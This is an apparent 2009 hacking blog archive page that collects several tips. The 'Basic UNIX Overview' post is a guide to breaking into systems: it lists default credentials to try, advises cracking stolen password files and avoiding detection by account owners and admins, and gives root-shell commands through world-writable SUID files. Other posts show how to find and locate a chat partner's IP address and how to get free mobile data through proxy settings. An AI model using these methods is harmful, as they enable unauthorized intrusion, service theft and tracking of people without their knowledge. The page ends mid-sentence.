Hacker's Choice: June 2009

Friday, June 12, 2009

Login with multiple ids at the same time in orkut

Login with multiple ids at the same time in orkut
Login with multiple ids at the same time in orkut , gmail , yahoo

To perform this trick u need firefox mozilla browser

======== Trick to Multilogin in firefox ============

Step 1:
open system properties(by right clicking my computer), choose tab advanced, click to environment variables button. in system variables section, click new. type this information to each textbox.

variable name: moz_no_remote(should be all small letter)

variable value: 1

press ok to close all windows.

step 2:
open firefox icon's properties(from desktop and quick launch). add extension -p to command line(like "c:\program files\mozilla firefox\firefox.exe" -p). press ok.

while starting firefox u have to create two separate profiles of firefox so that u can login to two accounts of any(orkut,yahoo,rediff or anything else)..

For three logins create three profiles of firefox.

A Basic UNIX Overview

UNIX FOR DOS ADDICTED WaReZ PuPPieZ AND THEIR PETS

Introduction
------------

One of the most common operating systems in existance is Unix. Unix exists in many different flavors, from Berkeley BSD to AT&T System V to SunOs. Basic working knowledge of Unix is almost essential to a hacker, as it is the system a hacker is most likely to come across. If you intend to use the internet at all, or to do any serious exploration of Telenet, the ability to navigate through Unix is a necessity. (Unix is also the single most interesting system in existance: it's just fun to fuck with).

Unix Logins
-----------

Most Unix logins look essentially the same. A general Unix login prompt looks something like this:
connected to five.finger.com
login:

That first line is the system identifier. Although it's not at all essential to what you are doing, it's good to know what system you are attempting to log on to. The second line is what typically identifies the system you are on as
Unix. Almost all Unix systems greet a user with the same prompt: login:.
Well, there's not much to do in Unix from the outside, and Unix systems are typically fairly secure at this point. You may be able to obtain a list of users, or current users, by logging in as 'who', but other than that there are few functions available here. Unless you are on the internet, or have accounts specifically for the specific machine you are on, the only way on to the system is to try the default passwords. What are the default passwords? Unix systems come installed with certain passwords automatically. In addition, some accounts must exist on a system. One such account is 'root'. This user is the divine Kami of the Unix system... in short, an all access pass. Unfortunately, few systems allow root logins remotely, and even fewer leave 'root' unpassworded. Nevertheless, it's always worth a shot... try this:

connected to ren.stimpy.net
login: root
password: root
invalid login
login:

well, nice try anyways... other possible passwords for root include 'sysadmin', 'sys', 'admin'... you get the idea. You may also want to try these passwords with a single digit appended (added, idiot) to them... meaning the password 'root' could be 'root1' or 'root2'. An interesting tip about passwords in general... many people that use passwords under 8 characters tend to add a digit or a non-alphanumeric character to the password. This is done in order to hinder guessing, and to stop password breakers (more on this later). In this case, you may want to try adding a space before root... or even an ascii 255 to the end.
Fortunately, there is more than one default password in a unix system... a quick list:

sys sys
bin bin
daemon daemon
rje rje
setup setup
uucp uucp/nuucp/anonymous
nuucp uucp/nuucp/anonymous
mountfsys mountfsys

In the System
-------------

Ok, at this point, I'm going to assume you've gotten past the login... as painful as that may sound. Although Unix may be secure from the outside, without effort from the system administrators, the inside of the system is not.
First off, you'll likely by asked for a terminal. vt100 serves your purposes sufficently, and it's typically the default, so hit enter. Now, hopefully, you have a prompt. There are many different types of unix prompts, some of which contain current directory information, some of which are just a single character. Just don't panic when my examples don't look exactly like what you've got on your screen. The first thing you *need* to do on the system is establish your tty paramters. As eldritch and arcane sounding as this term may seem, it's actually quite simple... you need to tell the system what keys are going to do what.
The command to set these parameters is 'stty'.
Watch: squinkyB ] stty erase ^h squinkyB ]

There... that wasn't so bad, was it? Well, it's also pretty meaningless to you, unless you have the ascii table memorized and are pretty good at on-the-spot deduction. The tty erase parameters determines which key is to be used as a backspace. At times, this may already be set when you log in, or it may be set to a suitable alternate (such as delete). Most of the time
the system will tell you when you log on if this is so. In this case, we've entered ^h in order to make the backspace key, appropriately enough, backspace.
Another extremely important parameter is 'intr'. The 'intr' paramter tells the Unix system what you intend to use as a break character...
you should have this set to ^c.

Getting Around
--------------

A good thing to remember about Unix is that it's alot like DOS. Files are laid out in directories just as in DOS... in fact, the only immediate difference in the directory structures is that Unix uses a forward slash ("/", moron!) instead of a backwards one.
Also, the basic Unix directory navigation command is identical to DOS. In order to change directories, you use the command 'chdir', or 'cd'.
A quick example:

1 /usr1/astoria ] cd ..
2 /usr ]

Wala. That simple. Quick notes:

ю cd / will take you to root.
ю cd /*pathname* will take you to *pathname*
ю cd home will take you to your home directory.

You can make and delete your own directories with the mkdir/rmdir commands. Simply put, mkdir makes a subdirectory off of the current directory, and rmdir removes a subdirectory from the current subdirectory. Good to know if you plan to do a lot of file transfers. An important note about Unix directories, files, and concepts:
Unix is a case-sensitive operating system. Thus, the files

ю Spleen
ю spleen
ю SPLEEN
ю SpLeEn

are all different. This rule applies to directories and command line paramters, as well as most other Unix ideas. Another nice thing to know about Unix: Unix files are not subject to the normal DOS 8 character limit. Thus, you can have vast filenames, such as "this_file_ate_my_biscuit".

Some other important commands
-----------------------------

First and foremost, you should know cp. cp is the basic Unix equivalent of the DOS COPY command. The command line for cp is
identical to that of COPY. Next on the scale of cosmic import is cat. cat is the Unix equivalent of the DOS TYPE command, and once again, for simple file displaying, the command line is identical.
Variations on the theme:
pg: displayes a file page by page. Type "pg x filename", where x is a number of lines to display before pausing and filename is the file you wish to display.
more: displays a file screen by screen.
Stupid pet trick:
You can use your cat to copy files, simply by using the directional operators. To copy a file from here to there using cat, simply type:

% cat here
this is the file here
% cat there
this is the file there
% cat here > there
% cat there
this is the file here

The operator ">" simply takes the output from the cat command and places is in the location specified after it.
Another vital command to know is 'rm'. rm deletes a file from the system, in the same way DEL would on a DOS system. Not to much else to say. Critical in your navigation of a Unix system is the ls command. ls is DOS DIR on heroin. Simply type ls and you get a nice, neat list of files in the directory.
DIR on controlled substances:
There are a few command line parameters that you should know... foremost is l. ls -l gets you a list of files, and valuable
information about each file, including permissions (more on that later), size, and linked files. Another useful command for long file lists is C. ls -C gets you a list of files in multiple columns, much the same as DIR /W would merit a double column report of all existing files. A quick reminder:
ls -C is NOT the same as ls -c. Unix = case sensitive.
Another good command to know, mv will move a file from directory to directory. For those of you without DOS 6.0 , mv simply copies a file to another directory and deletes the original. quick tip for files on the lam:
if you want to rename a file (to protect the innocent), you need to mv a file to a different file name. A quick demo:

# ls
myfile
# cat myfile
this is my file
# mv myfile my_other_file
# ls
my_other_file
# cat my_other_file
this is my file

Another vastly important command is 'man'. In fact, man is probably one of the most important commands extant for a beginning user... it calls up the system's help files. To use man, simply type in 'man command', where command is a Unix command you seek to gain enlightenment regarding. It's a great way to gain an understanding of Unix commandline parameters. If you are interested in seeing who's been on of late, or just want a few names to try to hack, type 'who'. You get a quick list of users that have accessed the system lately. If you need to know who you are at this point, type 'whoami'. If you want to change your identity on the system, type 'su name' where name is an account on the system. It'll ask you for the account
password, then, *presto*... instant transmogrification.
A Caveat for smart alec hackers:
Unix typically logs usage of the su command. While su may seem like a great opportunity to try to hack out passwords manually without worrying about the system hanging up after 3 attempts, it's typically not a good idea to do this, as it may alert the administrators to your presence.
*Numero Uno on the list of commands NEVER to use on a Unix system:
The 'passwd' command changes your password on a Unix system. Seems innocous enough, eh? Uh-uh. If your account is active, and there's a very strong chance that it either is or will be, there is no better way to lose the account than to change the password, only to have the legitimate user alert the sysadmins when he/she can't gain access to his/her normal account (well, there are better ways... you could simply mail the sysadmin and tell him you are trying to hack his grandmother's life support machine through your account). I've seen this single, quick command turn a extremely lax system into an ironclad security compound in less than a day.
DONT-FUCK-WITH-IT.
*Numero Dos on that same list:
The 'mail' command reads and sends mail. So what? Well, unless your account is stable (and it isn't unless you either paid for it or killed the original owner in such a way that his body cannot claw it's way out of it's grave to it's keyboard), the user is more likely than not going to know if you read his mail. In addition, if you send mail out of the system (type 'mail', and a username/address; type in your message and end it with a ^d on it's own line), the response from your
message will likewise alert the user to your presence.

System Spelunking
-----------------

The first place you want to check out in the wild uncharted directory tree of your friendly neighborhood Unix system is the "/etc" directory. What's in it? The single most intensely important file on the system (besides a world writable root owned SUID file... but don't worry about that)... the passwd file. What is in the passwd file?

ю a list of all accounts on the system
ю a list of the passwords for these accounts
ю a list of access levels for these accounts
ю a list of the home directories for these accounts
ю a list of information pertaining to these accounts.

Why the hell the Unix designers decided this file should be world readable is beyond me. Be content to know that your standard everyday run-of-the-mill-lacking-in-certified-cosmic-power 'cat' command WILL display this file. As will pg and more. However, because most users don't have write permissions (more on that later) to the /etc directory, 'cat' is pretty much the only applicable command here. However, if you need to copy the file to your own directory (for whatever reason), just cat it there with the directional operator (>).
The catch:
Well, there are two catches here. First off, regardless of system security, if the passwords are in the file, they are encrypted. You can't decrypt them. Although you can get a list of accounts without passwords this way (just look for accounts with no entry in the password field), and a list of accounts that can't be logged onto remotely/at all (NO LOGIN), you can't get much else. Sucks, don't it?
Notice I said 'if' the passwords are there.

Some horrible, paranoid, draconian system administrators mutilate their passwd files in such a way that (*gasp*) the passwords don't show up. All you get is one cold, icy X staring at you from the bowels of Unix Shell Siberia, mocking you as you pull your hair out in frustration (sorry, but this is a sore spot with me). The kidnapped passwords reside in the shadow file in the /etc directory, available with your standard everyday run-of-the-mill-but-distinct-in-the-fact-that-only-root-level-accounts-can-use-it-to-this-extent 'cat' command. Well, if the passwords are encrypted, what good are they? By themselves, nothing. A account with a Unix encrypted password will get you no further than an account with no listed password at all. You can't even deduce the amount of characters in the password if it's encrypted. So what's the use? The Unix method of encrypting files is available to the public. It is also, to most mortals, irreversable. Essentially, this means you can encrypt a string of characters, but not decrypt it. Even the unix
system itself doesn't decrypt the password when you log on... When you log on, the Unix system takes whatever you enter at the password prompt, encrypts it, and matches it to the entry in the passwd file. Thus, the Unix system never decrypts the password... it only compares it to a different encrypted string. While this may not sound too particularly useful at first, it is. There are programs that have been written to do the same thing on a personal computer... you supply it a list of passwords and a list of words to attempt to use as passwords (called dictionaries), and it spends the night encrypting dictionaries and matching them to password entries. By running a dictionary through a passwd file, on a typical system, you can usually get 10-20 accounts. Good personal computer examples of this program idea include Killer Cracker (the industry
standard, so to speak) and CrackerJack (faster than Killer Cracker). Quick tips for CrackerJunkies with leech access at an H/P BBS: A standard dictionary will not uncover passwords protected with an appended digit or non-alphanumeric character. In order to get around this, you need only grab a program that processes the dictionary file to add that digit to each entry in the dictionary... although this takes longer, and you'll need to do it multiple times, you can typically get 10 more accounts just by adding a 1 to every entry. Files and directories in Unix are characterized further by their permissions. Permissions are a standard system of who gets access to a specific function of that file or directory. Standard permissions include read, write, and execute. You can get a list of permissions by typing 'ls -l'. The first field in the listing contains the permissions, grouped as follows:

owner group world
--------------------
rwx rwx rwx

(Not drawn to scale... in fact, it doesn't look anything like that). Essentially, as long as the letter is there, you have access to that facet of the file. If the letter is not there, you'll see a dash... meaning you don't have access to that function. An example:

rwxr-x--x

In this case, the owner of the file can Read the file, Write to the file, and eXecute the file; members of his group (a bunch of linked accounts) can Read the file, CANNOT Write to the file, and can eXecute the file; and the rest of the user population CANNOT Read or Write to the file, but CAN eXecute the file.

rwx---rwx

is a WORLD-READABLE, WORLD-WRITABLE, WORLD-EXECUTABLE file. This simply means that anyone can read, write, or execute the file.

Another permission sometimes set to a file is the SUID bit. An SUID file contains a smallcase s in the user executable section of the permissions list...

rws--x--x

When you execute an SUID file, your user ID becomes that of the owner of the file. While this may not look to important at first, by now you should know that no really important super elite hacker concept does. Take a look at this:

rwsr-x--x

Synopsis? It's a world executable SUID file. In essence, anyone can execute the file, and in doing so, become the owner of the file for the duration of the time that file is operating. However, this doesn't get you much, because you typically can't do anything while the programis running. More likely than not, it's calculating how many pencils it needs to order for school tomorrow or some other such drivel. The real power of the SUID file comes into play in this situation:

rwsrwxrwx

You won't see a lot of these, but when you do, look out. What you have here is a world writable SUID file... and a world writable program can be any program on the system you have read access to. Like, say, /bin/sh... the Unix shell...
Quick command line example... 'diablo' is a root owned, world writable SUID file. I'm going to ignore the rest of the output of the ls command.

#ls -l
rwsrwxrwx... ...diablo
#cat /bin/sh > diablo
#diablo
$

Oh, just so you know, the $ prompt denotes root access. Good deal, huh? In general, if you have right privs to an SUID file,
copy it to your own directory and cat /bin/sh into it. You now have an instant gateway to the account of the owner of that file. If you want to find files that you can do this with, try this out:

#find / -user root -perm -4000 -exec /bin/ls -al {} ";"

This will give you a list of all root owned SUID files. If you want more info on the 'find' command, just 'man find'.

Well, I'm overdo for an appointment on the IRC in #warez... so I'll cut off here. I hope I've been of assistance to you.

How to Hack (Basic Tips To Start Hacking ) !!

How to Hack?

what they do to Hack?
These are the common enough question, asked on nearly every hacking board across the web, and yet, no one seems to be able to answer it.
One reason for this is the fact that the vast majority of people who really don't have, want, or need a clue. Then there's a small minority who have a good basic knowledge but simply not enough conviction to teach. Then there's the tiny minority who really know the ins and outs of computer systems, they can program exploits, bug fixes, and can generally fix, or find out how to fix nearly any problem. These are the people referred to as computer experts. An even smaller percentage of people again are called hackers. Hacker is a term that over recent time has been changed and exploited by the media to mean someone who breaks into and destroys a computer system. I don't like these people. These are the people who give true hackers a bad name. By dictionary definition, a hacker is someone who has an extraordinary ability to push a computer system, or program, to work beyond expected boundaries, "He hacked away at the program all night until he got it to work". A Hacker, in the true meaning should be respected, the modern interpretation, someone who breaks systems is traditionally known as a cracker

The biggest reason for someone to truly want to become a hacker is to learn. There's no bigger reason than this. The simple craving to learn about, change, understand and improve a computer system and/or program is the single biggest goal for any hacker. Maybe the second biggest reason behind hacking is freedom. To understand this you must fist understand what I talked about in the previous paragraph, that hacking is not breaking systems, but improving them. Any one who considers themselves half knowledgeable about the Internet should have heard of Gnu/Linux. If you haven't please refer to http://www.linux.org/info/index.html. Linux and the GNU project embody the spirit of what I consider to be a true hacker goal. The ideas of freedom, improvement and development should be at the heart of every hacker's life. The Internet itself is another representation of this ideal. There is no one owner of the Internet; anyone can access it for no costs other than that of a phone call. The Internet is the single biggest source of information the world has ever seen. It contains information on billions of subjects, the vast majority of which is absolutely free. A person with a connection to the Internet can access information on everything from quantum computing to the exploration of mars, from pro-anarchy to pro-capitalist. It allows all this information to be accessible to everyone with no discrimination on the basis of age, colour, religious or political orientation. That's enough of a rant on freedom now. I'm sure most people are reading this to find out what it takes to become a hacker.

A hacker, as I have previously explained, is a person who has a craving for knowledge. If you don't have the will to learn continuously, spend countless hours reading, researching and improving then hacking defiantly isn't for you. Many people will give up after a few months, many I'm sure didn't even make it to this far into the document, if you did then well done, keep reading, in time, you will learn to truly enjoy hacking away at your own programs and helping others too. I am by no means a hacker; neither do I claim to be. However, I have been reading, learning and sometimes even contributing for quite a while now, and hopefully this document will allow you to do the same. Enough talk. This is where you start to learn.

As by now you will know, the main aim of hacking is knowledge. Before you can even hope to understand how to improve software you must fist understand how the current software works. Since most newbies (Newbie n. Someone who has little knowledge or experience with computer systems and/or programs) I assuming will be using a version of the Windows OS (OS - Operating System) Since you wish to learn how to hack I am assuming you have quite a strong grasp of the basics or Windows such as how to run programs, navigate your hard disk, install new software, hardware etc. If you do not know how to do this use the built in help function by clicking Start -> Help, or use your favourite search engine, I suggest google.com as it's probably the largest in the world. Learn how to use everything about your OS, including MS-DOS. To open a MS-DOS prompt, or shell Click on Start -> Programs -> MS-DOS Prompt , if this fails or the link isn't there for some unknown reason click Start -> Run and then type 'command.com'. This will run the program command.com, which is located in the c:\ directory of your hard disk. There are various programs that can be run from the dos prompt, which are very useful in basic hacking techniques.

Intro to MS-DOS

MS-DOS is a command line OS which is the basis for most windows OS's. It has many internal commands such as copy, cd, cls, ren, del. And several external commands including sys, move, format, deltree, syscopy. Internal commands are commands which are built into the command.com program and so can be run in any MS-DOS with no dependencies, External commands are commands which are not built into command.com, they are external programs which are usually found in c:\windows\command but can be found anywhere. In DOS, to find out what a command does you can type 'command /?' at a dos prompt where command is the name of the command you wish to learn about. This is invaluable and if you ever need to find out what a command does, this is the first thing you should try. Next I am going to explain some basic MS-DOS commands which will be useful during your exploration of the web.

ping

Usage: ping [-options] hostname.domain

Output:

Pinging yahoo.com [66.218.71.112] with 32 bytes of data:
Reply from 66.218.71.112: bytes=32 time=306ms TTL=45
Reply from 66.218.71.112: bytes=32 time=430ms TTL=45
Reply from 66.218.71.112: bytes=32 time=295ms TTL=45
Reply from 66.218.71.112: bytes=32 time=340ms TTL=45
Ping statistics for 66.218.71.112:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 295ms, Maximum = 430ms, Average = 342ms

Ping sends a ping request to a domain name to test its reactivity and response times. It does this by sending a packet of information to the server in question and requests a response. The output, as you can see is tells you the domain name that is being pinged, its IP address, the size of packets sent out, the response times, and averages. Ping is a very useful command as it tells you the IP address of a domain name, and tells you if it is 'alive' and responsive. The uses of this will become apparent later on. To find out extra options that can be used with ping, type 'ping /?' at the dos prompt.

netstat

Usage: netstat [-options]

Output:

Active Connections
Proto Local Address Foreign Address State
TCP pbn-computer:1067 w3.dcx.yahoo.com:80 ESTABLISHED
TCP pbn-computer:1069 209.73.225.7:80 ESTABLISHED
TCP pbn-computer:1070 212.187.244.14:80 ESTABLISHED
TCP pbn-computer:1071 212.187.244.14:80 ESTABLISHED

Netstat gives a list of all connections coming to and from your computer. It displays the ports (A virtual port of a computer is like an imaginary route for information to come in and out of your computer (to the internet) All services and programs which use the internet use a different port to ensure that information does not get sent to the wrong program) and IP's of both ends of the connections. There are thousands of available ports, not something you run out of. Once again, typing 'traceroute /?' at the dos prompt to get more information. Netstat can also be used as a crude method of getting a person's IP. To do this you do the following, for the sake of simplicity you should try to minimise the number of connections, this can be done by closing internet browsers, chat programs etc. Firstly, you will need to talk to the person on a chat program such as msn messenger, aim, yahoo messenger or something similar. At the dos prompt type 'netstat > temp1.txt' this will give the standard output, but the output will be routed into the file temp.txt (which if does not exist, will be created, and if does exist will be over written). Next you will need to establish a direct connection with the target computer, this can be done by initiating a file transfer. Whilst the file transfer is talking place you will need to once again type 'netstat >temp2.txt'. The next task is to compare the two files (temp1.txt and temp2.txt), the second file should contain an IP address that is not in the first, this new connection is the connection you initiated o the target computer, hence the IP address is the IP of your target.

tracert

Usage: tracert [-options] IP

Output:

Tracing route to yahoo.com [66.218.71.113]
over a maximum of 30 hops:
1 * * * Request timed out.
2 175 ms 180 ms 180 ms cdf-dam1-a-fa11.inet.ntl.com [62.252.33.201]
3 185 ms 200 ms 200 ms 62.254.253.17
4 180 ms 170 ms 190 ms bir-bb-a-so-220-0.inet.ntl.com [213.105.172.45]
5 165 ms 180 ms 180 ms bir-bb-b-ge-720-0.inet.ntl.com [62.253.185.154]
6 320 ms 360 ms 320 ms yahoo-above-1.pao1.above.net [64.125.31.230]
7 400 ms 340 ms 339 ms ge-1-3-0.msr2.pao.yahoo.com [216.115.100.146]
8 315 ms 355 ms 345 ms vl11.bas2.scd.yahoo.com [66.218.64.138]
9 420 ms 320 ms 340 ms yahoo.com [66.218.71.113]
Trace complete.

Tracert short for trace route does exactly that, it traces the route taken by individual packets of information as they are transmitted across the Internet to the destination. The uses of this are numerous and will become clear as you learn more. In its simplest form it can be crudely used to find out a persons ISP and even locate them on a international level. For example, is you tracert a persons ISP, and the final hop before reaching them is m284-mp1-cvx1c.car.ntl.com [62.252.45.28] , we know that the person uses ntl as an ISP, on further investigation it can be found that ntl is a UK based ISP and the abbreviation .car. stands for Cardiff, a city in the UK. From this we know that the person in question uses ntl and lives in the vicinity of Cardiff. Encase any one out their is wondering, I do live in Cardiff, UK and the IP address is mine, its a dynamic IP address (dynamic means it changes every time I connect to the internet as oppose to static which means the connection is constant and IP does not change). Use 'tracert /?' for more information.

Ok, so they are three basic, and surprisingly simple yet useful commands to give you a basic understanding of DOS. If you want to learn more then I suggest you search the internet, http://www.google.com is, as far as I know, the biggest search engine on the web and along with the most simple of knowledge should allow you to find anything about anything.

The next step in your journey towards hackerdom is a programming language. Many people wonder why they should 'waste their time' learning a language to help them hack when they could just as easily download a trojan or other script kiddie (A 'script kiddie' is someone who uses other peoples programs to crack without the knowledge of how they work) tool to break into someone's computer. If you search the web I'm sure you can very easily find programs and viruses that let you take control of peoples computers, delete their programs and cause havoc. This is not hacking. Trojans, getting their name from the Greek trojan horse, require a program to be run on the target computer to allow you access. This will probably work on your friends who don't have virus scanners (as virus scanners will very easily pick up viruses) but if you set your sights on a computer owned by anyone with more than half a brain trojans simply are not effective. Again, to refer back to the original definition of hacking, it is about learning how systems work, how to improve them, not simply to break in and gain control. It is for this reason that in order to hack effectively you _must_ learn a programming language.

Their are many different languages out there to learn, they fall into two categories. There are interpreted languages, such as perl, python, bash scripting and even batch scripting (feel free to do a search on any of these to learn more about them). These languages are text files that contain commands that are interpreted by a program and then executed by the computer. They have the advantage of being quick to write and edit but the major advantage is that they can be run on any machine which supports the interpreter of that language but on the downside they run much slower than compiled languages and are generally less powerful. Compiled languages on the other hand create binary files, which do not require an interpreter. They are created when the language is written in a readable text file and then compiled by a compiler. This changes it into a binary file which understandable to humans. To change them you must edit the source code file and recompile them. They have the advantage of being much faster and they allow you to perform much more complex operations. However on the downside they take longer to edit and are OS specific. Examples of compiled languages are C and C++. It is advisable to learn at least one of each of the types of language as this will give you the advantages of both types of language. I suggest that you do some basic reading (again using a search engine) on all the languages I have mentioned. On a personal note, I would suggest that you learn perl, due to its power and simplicity as well as cross-platform compatibility and C, because it is as close as you will get to an Internet standard and is used by most open source programmers.

This brings me on to my next topic. Operating systems. As you immerse yourself into the world of hacking I'm sure you will hear everyone shouting at you to run gnu/Linux instead of windows. I'm also sure that most of you will have no idea why. First, a little history. The GNU project was started in 1984 with the aim of developing a completely free and open source operating system. In 1990 Linus Torvalds finished writing a Unix based open source kernel. An operating system is basically a lot of programs grouped together to run computer hardware the kernel is the software that interfaces directly with the hardware, and the other software interfaces with the kernel. In short, an operating system cannot exist with out both software and a kernel. By the time that Linus Torvalds finished writing his kernel, the Gnu project has just about finished writing their OS, all they were short of was a kernel. The timing was perfect. Linus and the GNU project teamed up to release the operating system which is commonly called Linux, but should be more accurately know as GNU/Linux. Since that time, Linus has continued developing his kernel and the GNU project has continued developing their software. Since then variations of the GNU/Linux system have developed called distributions. Each distribution is configured differently with slightly different software, each designed for different reasons. Examples of commonly used distributions are SuSe, RedHat, debian and slackware (each have .com sites). Linux is considered _the_ operating system for various reasons, not least of which is its freedom. The GNU/Linux operating system was, and is being, developed under the GNU public licence. This licence is intended to keep software free, under it you are able to change, sell or give away the software for any charge as long as you supply the source code along with it as so to enable other people to have the same rights as you have. Another benefit of the freedom of GNU/Linux is its stability, the fact that the source code is available to anyone means that anyone is free to add to it, change it, modify it. This means that if someone finds a bug they can find it, write a patch and submit it to the author who may include it in his next update. Due to its fundamental Unix like design, Linux is very virus resistant, its user based system it is hard for viruses to spread. Once again, if an exploit is found in and GNU/Linux software you can almost guarantee that a patch will be written within a few days, if not the same day, this means if security is a concern, you can keep your box wrapped up tight.

GNU/Linux also has many features built in which make it very good as a development platform. It has built in compilers for C and C++, most distributions also contain perl and python interpreters. Its openness also means that you can customise your distribution much more effectively than with windows, optimising it for speed, stability or security. This is the reason why most hackers or computer enthusiasts use Gnu/Linux. I'm not going to include a guide to how to use Linux, simply because their are so many out there do a search on google.com. However, since I'm feeling nice today I will point you in the direction of my favourite reference http://www.slackware.com/book/, it is supposed to be specific to Slackware Linux, but what it teaches is quite general and will work on any Linux system.

As well as all of the above, you should also continuously be reading and learning about current exploits and 'tricks' on both windows and Unix based operating systems. There is no end of information out there for those willing to search. To become a hacker you must want to learn about and more importantly understand everything you come into contact with. If there is a new concept you come into contact with, learn about it, search for it on google.com and if all else fails, ask.

Most hacks aim to gain root access, as you will now know from your experience of Linux systems, root is a super user that can do anything on the system. There are five common ways of getting root.

Misconfiguration

If excessive permission exists on certain directories and files, these can lead to gaining higher levels of access. For example, if /dev/kmem is writable it is possible to rewrite your UID to match root's. Another example would be if a .rhosts file has read/write permissions allowing anyone to write them. Yet another example would be a script launched at startup, cron, or respawned. If this script is editable, you could add commands to run with the same privileges as who started them (particularly for startup rc files this would be as root).

Poor SUID

Sometimes you will find scripts (shell or Perl) that perform certain tasks and run as root. If the scripts are writable by your id, you can edit it and run it. For example I once found a shutdown script world writable. By adding a few lines at the beginning of the script it was possible to have the script create a root shell in /tmp.

Race Conditions

A Race Condition is when a program creates a short opportunity for evil by opening a small window of vulnerability. For example, a program that alters a sensitive file might use a temporary backup copy of the file during its alteration. If the permissions on that temporary file allow it to be edited, it might be possible to alter it before the program finishes its editing process.

Poor Temp Files

Many programs create temporary files while they run. If a program runs as root and is not careful about where it puts its temp files and what permissions these temp files have, it might be possible to use links to create root-owned files.

Buffer Overflow

Buffer overflows are typically used to spawn root shells from a process running as root. A buffer overflow could occur when a program has a buffer for user-defined data and the user-defined data's length is not checked before the program acts upon it.

Four out of the five ways of getting root mentioned above are only applicable on a machine where you have local access. In these cases you will need to get an account on the machine. This could be in a school or collage that you attend, or simply an internet shell account. Since this text is only meant to be an introduction and outline guide I will not go into huge details about these. There is plenty of information on the web, once again I suggest you use google.com, I can't stress enough how useful a search engine is in the world of hacking.

By far the most common way to gain a root shell is through a buffer overflow. It is also unsurprisingly the most complicated of the about ways of getting root and deserves a bit more explanation. Firstly, a buffer is simply a block of computer memory, which holds data of a certain type. If, as I suggested, you have learnt, or are learning, how to program in C, you will probably associate buffers with arrays. A stack has a set amount of space in memory, if you overflow the buffer by sending too much information, the extra data overflows onto the next stack and can be used to execute arbitrary code. For a much better explanation of buffer overflow techniques I suggest you read Phrack 49, File 14, called "Smashing The Stack For Fun And Profit" which can be found at http://www.phrack.com/phrack/49/P49-14 .

Well, it looks like this guide has come to an end. There is only one thing that I have left to say. If you follow all the instructions I have mentioned above, you will have a very good understanding of how the Internet, Ms-dos, Windows, Linux and various hacking techniques work, You may even be considered by some to be a Hacker. If you do end up in this situation, the world is yours, continue to learn, expand and enjoy..

Vodafone Hack For Free GPRS

This method has been tested on different mobiles and has been confirmed to be working.
Followng are the Settings you require to configure on your Mobile:

Account Name: Vodafone_gprs
Homepage: http://live.vodafone.in
User Name: (no need)
Pass: (no need)

Access Point Settings:-

Proxy: Enabled
Proxy Address: 10.10.1.100
Proxy Port: 9401
Data Bearer: Packet Data

Bearer Settings:-
Packet Data Access Point: portalnmms
Network type: IPV4
Authentication: normal
User Name: (no need)
Password: (no need)

*IF that happen this settings is not working then change the proxy port number to:-

Proxy Port: 9401

Chat With Your Friends Through MS DOS Command Prompt

1) All you need is your friend’s IP Address and your Command Prompt.

2) Open Notepad and write this code as it is…..!

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

3) Now save this as “Messenger.Bat”.

4) Open Command Prompt.

5) Drag this file (.bat file) over to Command Prompt and press Enter.

6) You would then see something like this:

7) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:

Now all you need to do is type your message and press Enter.
Start Chatting…….!

Create An Ftp Server On Your PC

Process-1:
First of all u have to get an static IP-Address.
Need a a static ip-address for ur FTP Server.Necessity for getting this static ip-address is ur not suppose to use ur own IP-Address.The main reason is u dont want to show ur IP-Address to everyone , there are many other reasons too but leave them aside..

1) Goto no-ip & create urself a free account.

2) Now ur account been created & ll receive ur account password via mail to ur email address.

3) After getting ur password login to ur account of no-ip.com
4.After getting logged in, click upon add a HOST its on the left menu.

5) Type any hostname u want (eg:-abc) & select any domain from da given list (eg:-ftpserve.com) Click on Submit.

6) Now u have owned ur own static address (example: abc.serveftp.com)

7) Now click downloads button which is present above on the page & click on which operating system ur using & den download DNS update client or u can download it from here directly, this is for microsoft window users..

After getting downloaded, u have to install this software & login here with ur email addresss & p/w wen asked for it.

9) At last tick on da check box present at the static address.

10) U have ur own static web address.
Process-2:
Installation & setting of the FTP-Server

1) You have to install Serv-U 4.1.03 , download this software from here

2) Run Serv-U & use da wizard to setup ur FTP.

3) Click on next until u have been asked for IP-Address, leave it as it is & click upon next.

4) Enter ur domain name u have registered (example: abc.serveftp.com) it above in da domain field & click upon next.

5) U ll be asked for anonymous access, select No & click upon next.

6) Next u ll be asked for creating a named account, select yes & click upon next.

7) Choose any user name u wish (eg:-xyz) & clcik upon next.

Enter password for dis account (eg:-adc341) for security purpose choose difficult password.

9) U ll be asked for da home directory for the account which u have created above.Select directory & click upon next.

10) Click on yes for locking dis account to da home directory, doing dis da user cannot further move up into home directory, click upon next.

11) At last ur account has been created click finish.
Process-3:
Configuring the user accounts which u have been created.

1) On the left tree-menu, select da account which u have been created above & den click upon General Tab.

2) Goto Hide ‘Hidden’ Files.

3) Check Allow only and enter the number one in the box.

4) Set da maximum downloading speed upto wat extent u want.As this is an account so many ll be using so set it low(eg:-10-20) to save ur bandwidth.Don’t leave it blank as uers can download with full bandwidth.

5) choose how many users u want to login at on time.It depends on ur connection speed try these (56 – 1, ISDN – 3, ADSL or cable – 5-6 users.)

6) Click upon Dir Access Tab.

7) Now u can c home folder here.Highlight it & make ur permission.

If u want only users to download check only these Read,List & Inherit.

9) If u want ur users to upload into ur server & bu tto only 1 particular folder but not to downlaod, click upon dat add button & then select dat folder, Now u have to highlight dat folder & set these permissions on dat folder.Check,Write,Appened,List,Create & Inherit after setting these permissions click on the arrow which is present at the bottom right-hand corner.U want dis upload folder 2 be list first, before da home folder.

10) If der is any folder which u dont want anyone to access it, & it is present in the home folder, den click da add button & den select da folder.Now u have to highlight dat folder & see dat no all da checkboxes are left.After doing this click upon upper arrow which is present at bottom right hand corner.

11) There are many things u can do, These are only the basics….

12) Your server is now ready to be connected..

13) Login with your username & password…

Create Folders And Files With NO! Name

This trick will allow you to create files and folders without any name.

Just follow the steps as given below :-

1) Select any file or folder.

2) Right click on it, select ‘Rename’ or simply press ‘F2′.

3) Press and hold the ‘Alt’ key. While holding the Alt key, type numbers ‘0160′ from the numpad.

Note :- Type the numbers ‘0160′ from the numpad, that is, the numbers present on the right side of the keyboard.
Don’t type the numbers which are present on top of the character keys.

4) Press Enter and the nameless file or folder will be created.

Reason :- The file or folder that seems nameless is actually named with a single space.

But what if you want to create another nameless file or folder in the same directory ?
For this you will have to rename the file with 2 spaces.
Just follow the steps given below :-

